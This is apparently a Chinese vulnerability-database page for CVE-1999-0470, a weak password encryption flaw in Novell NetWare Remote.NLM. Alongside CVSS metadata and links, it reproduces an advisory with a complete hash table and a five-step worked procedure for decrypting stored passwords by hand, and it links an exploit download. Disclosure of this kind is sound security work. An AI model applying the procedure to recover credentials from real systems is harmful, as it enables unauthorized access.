CVE-1999-0470
CVSS5.0
发布时间 :1999-04-09 00:00:00
修订时间 :2008-09-09 08:34:37
NMCOE    

[原文]A weak encryption algorithm is used for passwords in Novell Remote.NLM, allowing them to be easily decrypted.


[CNNVD]Novell Remote.NLM弱加密漏洞(CNNVD-199904-021)

        Novell Remote.NLM使用一个弱加密算法导致密码容易被破译。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0470
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0470
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199904-021
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/482
(UNKNOWN)  BID  482

- 漏洞信息

Novell Remote.NLM弱加密漏洞
中危 设计错误
1999-04-09 00:00:00 2005-07-27 00:00:00
本地  
        Novell Remote.NLM使用一个弱加密算法导致密码容易被破译。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (19364)

Novell Netware 4.1/4.11 SP5B Remote.NLM Weak Encryption Vulnerability (EDBID:19364)
netware local
1999-04-09 Verified
0 dreamer
N/A [点击下载]
source: http://www.securityfocus.com/bid/482/info

The encrypted passwords for Remote.NLM are remotely accessible to anyone with the ability to view SYS:System\LDRemote.NCF. The password encryption algorithm for Remote.NLM has been broken and can be decrypted with pencil and paper.

The password will look something like this:
AF8CBBF48CA9955F5ADAFDADAA23

The structure of the password is as follows:
AF8CBBF48CA99 55F5ADAFDADAA - 23

The first section contains the low-order bits, and the second, the high-order bits. 23 is the time byte, which is decremented by the server once every two seconds, from FF to 02, then back up to FF, etc.

Step 1) Realign the low-order bits and high-order bits.
This is extremely simple to do. The high-order bits are in order from the first character to the last, and so are the low-order bits.
Example:
Password: AF8CBBF48CA99 - 55F5ADAFDADAA,
Output: 5A 5F F8 5C AB DB AF F4 D8 AC DA A9 A9
At this point, ignore 5A 5F F8 5C, or the first four bytes. They are appended somewhere during encryption, and decrypt to "%*@$". It was a TERRIBLE idea for Novell to implement those four characters into every single password, as those are what helped me rebuild their hash table from scratch. Also, if the length of the password is 10, the password is automatically decryptable to nul.

Step 2) Match each of the password characters (group of two hex characters) to the hash table below. Use their position from the beginning of the table to determine the value of the pre-hash encrypted password. Example: F4, the 8th character of the password, matches the hash table at 95. This means that 95 is the pre-hash value of F4. Thus far, (ignoring the first four characters) the password was:
AB DB AF F4 D8 AC DA A9 A9
and now the password is:
98 A0 9B 95 A1 9D A6 9C 9C

Remote.NLM Hash Table

00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00 5B 58 5E 5F 59 5C 5A 5D-73 70 76 77 71 74 72 75
10 13 10 16 17 11 14 12 15-7B 78 7E 7F 79 7C 7A 7D
20 53 50 56 57 51 54 52 55-03 00 06 07 01 04 02 05
30 1B 18 1E 1F 19 1C 1A 1D-0B 08 0E 0F 09 0C 0A 0D
40 2B 28 2E 2F 29 2C 2A 2D-63 60 66 67 61 64 62 65
50 83 80 86 87 81 84 82 85-3B 38 3E 3F 39 3C 3A 3D
60 8B 88 8E 8F 89 8C 8A 8D-33 30 36 37 31 34 32 35
70 93 90 96 97 91 94 92 95-6B 68 6E 6F 69 6C 6A 6D
80 9B 98 9E 9F 99 9C 9A 9D-A3 A0 A6 A7 A1 A4 A2 A5
90 F3 F0 F6 F7 F1 F4 F2 F5-AB A8 AE AF A9 AC AA AD
A0 DB D8 DE DF D9 DC DA DD-FB F8 FE FF F9 FC FA FD
B0 23 20 26 27 21 24 22 25-B3 B0 B6 B7 B1 B4 B2 B5
C0 CB C8 CE CF C9 CC CA CD-BB B8 BE BF B9 BC BA BD
D0 C3 C0 C6 C7 C1 C4 C2 C5-D3 D0 D6 D7 D1 D4 D2 D5
E0 43 40 46 47 41 44 42 45-E3 E0 E6 E7 E1 E4 E2 E5
F0 4B 48 4E 4F 49 4C 4A 4D-EB E8 EE EF E9 EC EA ED

Step 3) Subtract the length (the number of groups of hex characters, excluding the time character) of the full password from each encrypted password character. Now you have the ACTUAL pre-hash encrypted password. If the subtracted value is negative then simply continue from FF down to the negative value. Example: if the password character is at 04, and the length is 6, the value of the password character will be FF.

The length is 13 (D in hex), so the password was:
98 A0 9B 95 A1 9D A6 9C 9C
and is now:
8B 93 8E 88 94 90 99 8F 8F

Step 4) Get the time var, in this situation 23 (hex), and subtract it from FF. This new character is for use in Step 5. Example: FF-23=DC.

Step 5) Finally, XOR each character (group of 2 hex characters) of the encrypted password with the new time character, and you now have the decrypted password!

The password was:
8B 93 8E 88 94 90 99 8F 8F (before the XOR)

Now, the decrypted password is:
57 4F 52 54 48 4C 45 53 53
"WORTHLESS"

The exploit program does all this automatically. 

http://www.exploit-db.com/sploits/19364.zip		

- 漏洞信息

10919
Novell Remote.NLM Weak Password Encryption Scheme
Remote / Network Access Cryptographic
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

1999-04-09 Unknow
1999-04-09 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站